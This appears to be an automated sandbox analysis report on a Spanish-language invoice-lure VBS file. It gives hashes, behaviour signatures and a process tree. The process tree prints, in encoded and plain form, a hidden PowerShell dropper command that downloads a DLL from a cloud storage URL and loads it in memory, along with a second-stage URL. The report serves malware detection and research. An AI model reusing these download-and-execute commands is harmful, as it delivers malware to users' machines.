Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-01-2024 05:37

General

  • Target

    facturas y datos bancarios.vbs

  • Size

    4KB

  • MD5

    459d63c87281a7c35bd3fb015d41c155

  • SHA1

    14d20f30b220aa969573953606ddcd3392d3bfe2

  • SHA256

    0215fb5ca62cce5debc7bb6720ef089b075aa4167632ae21f9a1df42636b880c

  • SHA512

    ed0e3cb0430a7b2538da3aaa77cfbeeb17d32f5cf625c6eb33177409dd7754ae79ebf955ecdea23bc8ab3e4493dce5bdf7abbcd1bb69c723c93a1d63b3c2a1c7

  • SSDEEP

    96:SDv8vBDqazRdWDkXrV+DVfFf8f7RIT9r17T9rN9rz9rdf9rB:0uxda5tUD+T9x7T9R9f95f9l

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://firebasestorage.googleapis.com/v0/b/truk-droid.appspot.com/o/Droid%2BTurk.txt?alt=media&token=9399305d-e471-4325-b9cf-905c0718f95e

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\facturas y datos bancarios.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AdAByAHUAawAtAGQAcgBvAGkAZAAuAGEAcABwAHMAcABvAHQALgBjAG8AbQAvAG8ALwBEAHIAbwBpAGQAJQAyAEIAVAB1AHIAawAuAHQAeAB0AD8AYQBsAHQAPQBtAGUAZABpAGEAJgB0AG8AawBlAG4APQA5ADMAOQA5ADMAMAA1AGQALQBlADQANwAxAC0ANAAzADIANQAtAGIAOQBjAGYALQA5ADAANQBjADAANwAxADgAZgA5ADUAZQAnACkAKQA7AFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAGUAKAAnAEYAaQBiAGUAcgAuAEgAbwBtAGUAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4ANAA2AGUAcwBhAGIAeQByAGUAdgBvAGMAZQByAHQAYwBhAHQAbgBvAGMAbgBpAGcAaQByAG8AZABpAG8AcgBkAC8AMgA5AC4AMAA3ADEALgAyADYALgA1ADQALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4380
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/truk-droid.appspot.com/o/Droid%2BTurk.txt?alt=media&token=9399305d-e471-4325-b9cf-905c0718f95e'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.46esabyrevocertcatnocnigirodiord/29.071.26.54//:ptth'))"
    1⤵
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4552

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4380-0-0x000002755CAC0000-0x000002755CAE2000-memory.dmp

    Filesize

    136KB

  • memory/4380-12-0x0000027574E40000-0x0000027574E50000-memory.dmp

    Filesize

    64KB

  • memory/4380-11-0x0000027574E40000-0x0000027574E50000-memory.dmp

    Filesize

    64KB

  • memory/4380-10-0x00007FFC3A2F0000-0x00007FFC3ADB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4380-32-0x00007FFC3A2F0000-0x00007FFC3ADB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4552-23-0x0000027F57520000-0x0000027F57530000-memory.dmp

    Filesize

    64KB

  • memory/4552-22-0x00007FFC3A2F0000-0x00007FFC3ADB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4552-24-0x0000027F57520000-0x0000027F57530000-memory.dmp

    Filesize

    64KB

  • memory/4552-28-0x00007FFC3A2F0000-0x00007FFC3ADB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4552-27-0x0000027F57520000-0x0000027F57530000-memory.dmp

    Filesize

    64KB